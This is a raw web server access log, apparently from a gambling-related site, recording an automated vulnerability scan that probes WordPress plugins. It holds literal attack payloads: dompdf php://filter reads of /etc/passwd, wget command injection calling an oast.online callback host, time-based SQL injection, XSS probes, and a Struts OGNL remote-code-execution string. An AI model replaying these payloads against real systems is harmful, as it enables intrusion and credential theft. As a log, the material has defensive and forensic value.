[24/Apr/2025:00:28:45 -0400] "GET /wp-content/plugins/2-click-socialmedia-buttons/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:00:28:45 -0400] "GET /wp-content/plugins/mf-gig-calendar/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.65" 154.84.62.234 - - [24/Apr/2025:00:29:42 -0400] "GET /wp-content/plugins/download-monitor/readme.txt HTTP/1.1" 200 0 "-" 
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.7.18" 154.84.62.234 - - [24/Apr/2025:00:30:55 -0400] "GET /wp-content/plugins/wp-integrator/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:00:32:20 -0400] "POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:32:20 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:00:37:38 -0400] "POST /_search?pretty HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/617.7 (KHTML, like Gecko) Version/17.3.74 Safari/617.7" 154.84.62.234 - - [24/Apr/2025:00:38:02 -0400] "GET /PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 6.2; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:00:38:02 -0400] "GET /dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:00:38:03 -0400] "GET /wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0" 154.84.62.234 - - [24/Apr/2025:00:38:03 -0400] "GET /wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:38:03 -0400] "GET 
/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.17" 154.84.62.234 - - [24/Apr/2025:00:38:03 -0400] "GET /lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:38:03 -0400] "GET /includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.3.26" 154.84.62.234 - - [24/Apr/2025:00:38:03 -0400] "GET /wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:38:03 -0400] "GET /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:38:03 -0400] "GET /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 6.2; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:00:38:03 -0400] "GET /wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:39:45 -0400] "GET 
/wp-content/plugins/uploader/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.22" 154.84.62.234 - - [24/Apr/2025:00:39:47 -0400] "GET /wp-content/plugins/trafficanalyzer/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.9.25" 154.84.62.234 - - [24/Apr/2025:00:40:33 -0400] "GET /wp-content/plugins/duplicator/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.63" 154.84.62.234 - - [24/Apr/2025:00:40:35 -0400] "GET /wp-content/plugins/category-grid-view-gallery/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:42:41 -0400] "GET /backupmgt/localJob.php?session=fail;wget+http://d04qr7ij4pq19d75k490p3qa69wwcio51.oast.online; HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.34" 154.84.62.234 - - [24/Apr/2025:00:42:44 -0400] "GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://d04qr7ij4pq19d75k490prgm5h7iwkd8g.oast.online; HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.7.25" 154.84.62.234 - - [24/Apr/2025:00:43:30 -0400] "POST /?q=node&destination=node HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:52:26 -0400] "POST /webadmin/auth/verification.php HTTP/1.1" 200 0 "https://mgrokokbet.id/webadmin/start/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:00:54:08 -0400] "GET 
/wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.79" 77.111.245.12 - - [24/Apr/2025:00:56:25 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:00:56:27 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 154.84.62.234 - - [24/Apr/2025:00:58:44 -0400] "GET /wp-content/plugins//wp-planet/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:00:58:46 -0400] "GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.5.19" 154.84.62.234 - - [24/Apr/2025:00:59:21 -0400] "POST /website/blog/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:59:22 -0400] "POST /_search HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36 HeyTapBrowser/45.11.0.1.1 Chrome/91.0.4472.88" 154.84.62.234 - - [24/Apr/2025:01:00:24 -0400] "POST /wp-login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:00:31 -0400] "GET /wp-admin/admin.php?where1=<script>alert(document.domain)</script>&searchsubmit=Buscar&page=nsp_search HTTP/1.1" 200 
0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:01:01 -0400] "GET /wp-content/plugins/activehelper-livehelp/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:01:01:02 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:01:02:11 -0400] "POST /login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/8.0.0 Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:01:03:08 -0400] "POST /cgibin/webproc HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.79" 154.84.62.234 - - [24/Apr/2025:01:03:09 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:04:37 -0400] "GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:01:07:34 -0400] "GET /wp-content/plugins/navis-documentcloud/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:01:07:56 -0400] "PUT /_snapshot/test HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:08:00 -0400] "PUT /_snapshot/test2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14816.131.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 77.111.245.12 - - [24/Apr/2025:01:08:49 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; 
Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:01:09:03 -0400] "POST /login.php HTTP/1.1" 200 0 "https://mgrokokbet.id/Rest.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:01:09:05 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "https://mgrokokbet.id/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:01:09:42 -0400] "POST /login.php HTTP/1.1" 200 0 "https://mgrokokbet.id/Rest.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:01:09:47 -0400] "POST /login.php HTTP/1.1" 200 0 "https://mgrokokbet.id/Rest.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:01:10:14 -0400] "GET /Rest.html HTTP/1.1" 200 8912 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:01:10:20 -0400] "POST /login.php HTTP/1.1" 200 0 "https://mgrokokbet.id/Rest.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:01:10:29 -0400] "GET /login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:01:10:36 -0400] "POST /login.php HTTP/1.1" 200 0 "https://mgrokokbet.id/Rest.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 154.84.62.234 - - 
[24/Apr/2025:01:11:00 -0400] "GET /wp-content/plugins/church-admin/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 77.111.245.12 - - [24/Apr/2025:01:12:35 -0400] "POST /login.php HTTP/1.1" 200 0 "https://mgrokokbet.id/Rest.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:01:13:23 -0400] "GET /?ND HTTP/1.1" 200 0 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 154.84.62.234 - - [24/Apr/2025:01:14:05 -0400] "GET /wp-content/plugins/sourceafrica/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:14:06 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 102.164.97.24 - - [24/Apr/2025:01:14:53 -0400] "GET /wsssk.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.24 - - [24/Apr/2025:01:14:54 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "https://mgrokokbet.id/wsssk.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 77.111.245.12 - - [24/Apr/2025:01:15:10 -0400] "GET /wsssk.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:01:15:16 -0400] "GET /wsssk.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:01:15:31 -0400] "GET /wsssk.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows 
NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:01:15:51 -0400] "GET /wsssk.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 77.111.245.12 - - [24/Apr/2025:01:16:12 -0400] "GET /wsssk.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0" 102.164.97.24 - - [24/Apr/2025:01:16:31 -0400] "GET /wsssk.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.24 - - [24/Apr/2025:01:16:46 -0400] "GET /info.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.24 - - [24/Apr/2025:01:18:16 -0400] "GET /wsssk.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:22:06 -0400] "GET /wp-content/plugins/wp-symposium/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:22:06 -0400] "GET /wp-content/plugins/admin-font-editor/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 \\(Windows NT 10.0\\; Win64\\; x64\\) AppleWebKit/537.36 \\(KHTML, like Gecko\\) Chrome/100.0.4896.60 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:23:01 -0400] "GET /wp-content/plugins/defa-online-image-protector/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:23:01 -0400] "GET /wp-content/plugins/anti-plagiarism/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; 
rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:01:23:01 -0400] "GET /wp-content/plugins/ajax-random-post/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:01:23:34 -0400] "GET /wp-content/plugins/e-search/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:01:23:34 -0400] "GET /wp-content/plugins/e-search/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:27:22 -0400] "GET /wp-content/plugins/enhanced-tooltipglossary/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.1) AppleWebKit/616.8 (KHTML, like Gecko) Version/17.2.12 Safari/616.8" 154.84.62.234 - - [24/Apr/2025:01:29:47 -0400] "GET /wp-content/plugins/forget-about-shortcode-buttons/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 154.84.62.234 - - [24/Apr/2025:01:29:48 -0400] "GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:01:31:13 -0400] "GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:32:58 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:32:58 -0400] "GET /wp-content/plugins/hero-maps-pro/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.54" 154.84.62.234 - - [24/Apr/2025:01:34:29 
-0400] "GET /wp-content/plugins/s3-video/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:34:29 -0400] "GET /wp-content/plugins/photoxhibit/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:01:34:29 -0400] "GET /wp-content/plugins/indexisto/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:34:29 -0400] "GET /wp-content/plugins/parsi-font/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:01:34:29 -0400] "GET /wp-content/plugins/page-layout-builder/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:34:29 -0400] "GET /wp-content/plugins/new-year-firework/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:01:34:29 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:34:30 -0400] "GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:36:12 -0400] "GET /wp-content/plugins/simpel-reserveren/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.3.18" 102.164.97.24 - - [24/Apr/2025:01:36:18 -0400] "GET /wsssk.php 
HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 102.164.97.24 - - [24/Apr/2025:01:38:07 -0400] "GET /wsssk.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:40:08 -0400] "GET / HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:01:40:09 -0400] "GET /?author=1 HTTP/1.1" 200 0 "-" "-" 154.84.62.234 - - [24/Apr/2025:01:40:24 -0400] "POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:01:41:00 -0400] "GET /wp-content/plugins/tidio-form/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.7.24" 154.84.62.234 - - [24/Apr/2025:01:42:35 -0400] "POST /boardDataWW.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:01:43:43 -0400] "GET /wp-content/plugins/whizz/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0" 154.84.62.234 - - [24/Apr/2025:01:43:43 -0400] "GET /wp-content/plugins/tidio-gallery/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:01:44:31 -0400] "GET 
/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:01:47:07 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0" 154.84.62.234 - - [24/Apr/2025:01:47:18 -0400] "GET /BSW_cxttongr.htm HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_1_8; en) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:01:47:18 -0400] "POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 